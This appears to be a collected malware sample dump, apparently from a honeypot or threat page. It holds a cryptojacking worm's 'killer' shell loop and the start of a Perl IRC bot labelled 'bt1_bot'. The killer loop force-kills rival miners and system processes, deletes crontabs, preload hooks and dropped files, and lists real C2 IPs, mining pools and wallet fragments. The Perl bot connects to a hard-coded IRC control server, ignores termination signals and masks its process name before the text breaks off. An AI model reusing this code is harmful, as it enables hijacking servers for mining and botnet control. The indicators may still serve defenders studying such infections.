ps aux | grep -v grep | grep 'cr5.sh'| grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'cr5.sh'| grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs kill -9
ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs kill -9
ps auxf| grep -v grep | grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "monerohash.com"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf| grep -v grep | grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps auxf| grep xiaoyao | awk '{print $2}'|xargs kill -9
ps auxf| grep xiaoxue | awk '{print $2}'|xargs kill -9
netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
pgrep -f monerohash|xargs kill -9
pgrep -f L2Jpbi9iYXN|xargs kill -9
pgrep -f xzpauectgr|xargs kill -9
pgrep -f slxfbkmxtd|xargs kill -9
pgrep -f mixtape|xargs kill -9
pgrep -f addnj|xargs kill -9
pgrep -f 200.68.17.196|xargs kill -9
pgrep -f IyEvYmluL3NoCgpzUG|xargs kill -9
pgrep -f KHdnZXQgLXFPLSBodHRw|xargs kill -9
pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3|xargs kill -9
pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo|xargs kill -9
pgrep -f mwyumwdbpq.conf|xargs kill -9
pgrep -f honvbsasbf.conf|xargs kill -9
pgrep -f mqdsflm.cf|xargs kill -9
pgrep -f stratum|xargs kill -9
pgrep -f lower.sh|xargs kill -9
pgrep -f ./ppp|xargs kill -9
pgrep -f cryptonight|xargs kill -9
pgrep -f ./seervceaess|xargs kill -9
pgrep -f ./servceaess|xargs kill -9
pgrep -f ./servceas|xargs kill -9
pgrep -f ./servcesa|xargs kill -9
pgrep -f ./vsp|xargs kill -9
pgrep -f ./jvs|xargs kill -9
pgrep -f ./pvv|xargs kill -9
pgrep -f ./vpp|xargs kill -9
pgrep -f ./pces|xargs kill -9
pgrep -f ./rspce|xargs kill -9
pgrep -f ./haveged|xargs kill -9
pgrep -f ./jiba|xargs kill -9
pgrep -f ./watchbog|xargs kill -9
pgrep -f ./A7mA5gb|xargs kill -9
pgrep -f kacpi_svc|xargs kill -9
pgrep -f kswap_svc|xargs kill -9
pgrep -f kauditd_svc|xargs kill -9
pgrep -f kpsmoused_svc|xargs kill -9
pgrep -f kseriod_svc|xargs kill -9
pgrep -f kthreadd_svc|xargs kill -9
pgrep -f ksoftirqd_svc|xargs kill -9
pgrep -f kintegrityd_svc|xargs kill -9
pgrep -f jawa|xargs kill -9
pgrep -f oracle.jpg|xargs kill -9
pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN|xargs kill -9
pgrep -f 188.209.49.54|xargs kill -9
pgrep -f 181.214.87.241|xargs kill -9
pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ|xargs kill -9
pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj|xargs kill -9
pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK|xargs kill -9
pgrep -f servim|xargs kill -9
pgrep -f kblockd_svc|xargs kill -9
pgrep -f native_svc|xargs kill -9
pgrep -f sshd2|xargs kill -9
pgrep -f ynn|xargs kill -9
pgrep -f perl|xargs kill -9
pgrep -f 65ccEJ7|xargs kill -9
pgrep -f jmxx|xargs kill -9
pgrep -f 2Ne80nA|xargs kill -9
pgrep -f sysstats|xargs kill -9
pgrep -f systemxlv|xargs kill -9
pgrep -f watchbog|xargs kill -9
pgrep -f OIcJi1m|xargs kill -9
pkill -f biosetjenkins
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f XJnRj
pkill -f mgwsl
pkill -f pythno
pkill -f jweri
pkill -f lx26
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f polkitd
pkill -f nanoWatch
pkill -f zigw
pkill -f devtool
pkill -f devtools
pkill -f systemctI
pkill -f watchbog
pkill -f cryptonight
pkill -f sustes
pkill -f xmrig
pkill -f xmr-stak
pkill -f suppoie
pkill -f zer0day.ru
pkill -f dbus-daemon--system
pkill -f nullcrew
pkill -f systemctI
pkill -f kworkerds
pkill -f init10.cfg
pkill -f /wl.conf
pkill -f crond64
pkill -f sustse
pkill -f vmlinuz
rm -rf /tmp/wc.conf
rm -rf /tmp/sustse
rm -rf /tmp/php
rm -rf /tmp/p2.conf
rm -rf /tmp/pprt
rm -rf /tmp/ppol
rm -rf /tmp/javax/config.sh
rm -rf /tmp/javax/sshd2
rm -rf /tmp/.profile
rm -rf /tmp/1.so
rm -rf /tmp/kworkerds
rm -rf /tmp/kworkerds3
rm -rf /tmp/kworkerdssx
rm -rf /tmp/xd.json
rm -rf /tmp/syslogd
rm -rf /tmp/syslogdb
rm -rf /tmp/65ccEJ7
rm -rf /tmp/jmxx
rm -rf /tmp/2Ne80nA
rm -rf /tmp/dl
rm -rf /tmp/ddg
rm -rf /tmp/systemxlv
rm -rf /tmp/systemctI
rm -rf /tmp/.abc
rm -rf /tmp/osw.hb
rm -rf /tmp/.tmpleve
rm -rf /tmp/.tmpnewzz
rm -rf /tmp/.java
rm -rf /tmp/.omed
rm -rf /tmp/.tmpc
rm -rf /tmp/.tmpleve
rm -rf /tmp/.tmpnewzz
rm -rf /tmp/gates.lod
rm -rf /tmp/conf.n
rm -rf /tmp/update.sh
rm -rf /tmp/devtool
rm -rf /tmp/devtools
rm -rf /tmp/fs
rm -rf /tmp/.rod
rm -rf /tmp/.rod.tgz
rm -rf /tmp/.rod.tgz.1
rm -rf /tmp/.rod.tgz.2
rm -rf /tmp/.mer
rm -rf /tmp/.mer.tgz
rm -rf /tmp/.mer.tgz.1
rm -rf /tmp/.hod
rm -rf /tmp/.hod.tgz
rm -rf /tmp/.hod.tgz.1
rm -rf /tmp/84Onmce
rm -rf /tmp/C4iLM4L
rm -rf /tmp/lilpip
rm -rf /tmp/3lmigMo
rm -rf /tmp/am8jmBP
rm -rf /tmp/tmp.txt
rm -rf /tmp/baby
rm -rf /tmp/.lib
rm -rf /tmp/systemd
rm -rf /tmp/lib.tar.gz
rm -rf /tmp/baby
rm -rf /tmp/java
rm -rf /tmp/j2.conf
rm -rf /tmp/.mynews1234
rm -rf /tmp/a3e12d
rm -rf /tmp/.pt
rm -rf /tmp/.pt.tgz
rm -rf /tmp/.pt.tgz.1
rm -rf /tmp/go
rm -rf /tmp/java
rm -rf /tmp/j2.conf
rm -rf /tmp/.tmpnewasss
rm -rf /tmp/java
rm -rf /tmp/go.sh
rm -rf /tmp/go2.sh
rm -rf /tmp/.censusqqqqqqqqq
rm -rf /tmp/.kerberods
rm -rf /tmp/kerberods
rm -rf /tmp/seasame
rm -rf /tmp/touch
rm -rf /tmp/.p
rm -rf /tmp/runtime2.sh
rm -rf /tmp/runtime.sh
rm -f /usr/sbin/kerberods
rm -f /usr/sbin/kthrotlds
rm -f /usr/sbin/kintegrityds
rm -f /usr/sbin/kpsmouseds
rm -f /etc/rc.d/init.d/kerberods
rm -f /etc/init.d/netdns
rm -f /etc/rc.d/init.d/kthrotlds
rm -f /etc/rc.d/init.d/kpsmouseds
rm -f /etc/rc.d/init.d/kintegrityds
rm -rf /dev/shm/z3.sh
rm -rf /dev/shm/z2.sh
rm -rf /dev/shm/.scr
rm -rf /dev/shm/.kerberods
rm -f /etc/ld.so.preload
rm -f /usr/local/lib/libioset.so
chattr -i /etc/ld.so.preload
rm -f /etc/ld.so.preload
rm -f /usr/local/lib/libioset.so
rm -rf /tmp/watchdogs
rm -rf /etc/cron.d/tomcat
rm -rf /etc/cron.d/root
rm -rf /var/spool/cron/root
rm -rf /var/spool/cron/crontabs/root
rm -rf /etc/rc.d/init.d/watchdogs
rm -rf /usr/sbin/watchdogs
rm -f /tmp/kthrotlds
rm -f /etc/rc.d/init.d/kthrotlds
rm -rf /tmp/.sysbabyuuuuu12
rm -rf /tmp/logo9.jpg
rm -rf /tmp/miner.sh
rm -rf /tmp/nullcrew
rm -rf /tmp/proc
rm -rf /tmp/2.sh
rm -rf /tmp/.XIMunix
rm -f /var/tmp/dog2.61
rm -f /var/tmp/prot
rm -f /tmp/prot
rm -f /usr/sbin/kerberods
rm -f /usr/sbin/kthrotlds
rm -f /usr/sbin/kintegrityds
rm -f /usr/sbin/kpsmouseds
rm /opt/atlassian/confluence/bin/1.sh
rm /opt/atlassian/confluence/bin/1.sh.1
rm /opt/atlassian/confluence/bin/1.sh.2
rm /opt/atlassian/confluence/bin/1.sh.3
rm /opt/atlassian/confluence/bin/3.sh
rm /opt/atlassian/confluence/bin/3.sh.1
rm /opt/atlassian/confluence/bin/3.sh.2
rm /opt/atlassian/confluence/bin/3.sh.3
rm -rf /var/tmp/f41
rm -rf /var/tmp/2.sh
rm -rf /var/tmp/config.json
rm -rf /var/tmp/xmrig
rm -rf /var/tmp/1.so
rm -rf /var/tmp/kworkerds3
rm -rf /var/tmp/kworkerdssx
rm -rf /var/tmp/kworkerds
rm -rf /var/tmp/wc.conf
rm -rf /var/tmp/nadezhda.
rm -rf /var/tmp/nadezhda.arm
rm -rf /var/tmp/nadezhda.arm.1
rm -rf /var/tmp/nadezhda.arm.2
rm -rf /var/tmp/nadezhda.x86_64
rm -rf /var/tmp/nadezhda.x86_64.1
rm -rf /var/tmp/nadezhda.x86_64.2
rm -rf /var/tmp/sustse3
rm -rf /var/tmp/sustse
rm -rf /var/tmp/moneroocean/
rm -rf /var/tmp/config.json
rm -rf /var/tmp/devtool
rm -rf /var/tmp/devtools
rm -rf /var/tmp/play.sh
rm -rf /var/tmp/systemctI
rm -rf /var/tmp/update.sh
rm -rf /var/tmp/.java
rm -rf /var/tmp/1.sh
rm -rf /var/tmp/conf.n
rm -r /var/tmp/lib
rm -r /var/tmp/.lib
touch /tmp/lok
mkdir -p /tmp/khugepageds
rm -rf /var/tmp/yum-confluence-*
};
while true; do
KILLER
sleep 1;
done
bt1_bot (not working)
cat /dev/shm/bt1.txt
#!/usr/bin/perl
my $processo =("test123");
my @titi = ("index.php?page=","main.php?page=");
my $goni = $titi[rand scalar @titi];
my $linas_max='3';
my $sleep='7';
my @adms=("x", "y", "z", "w" );
my @hostauth=("local");
my @canais=("#3w");
chop (my $nick = `uname`);
my $servidor="193.56.28.207";
my $ircname =("g");
my $realname = ("g");
my @ircport = ("80","143");
my $porta = $ircport[rand scalar @ircport];
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/tmp");
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]
Fragen? Kontakt: info@zero.bs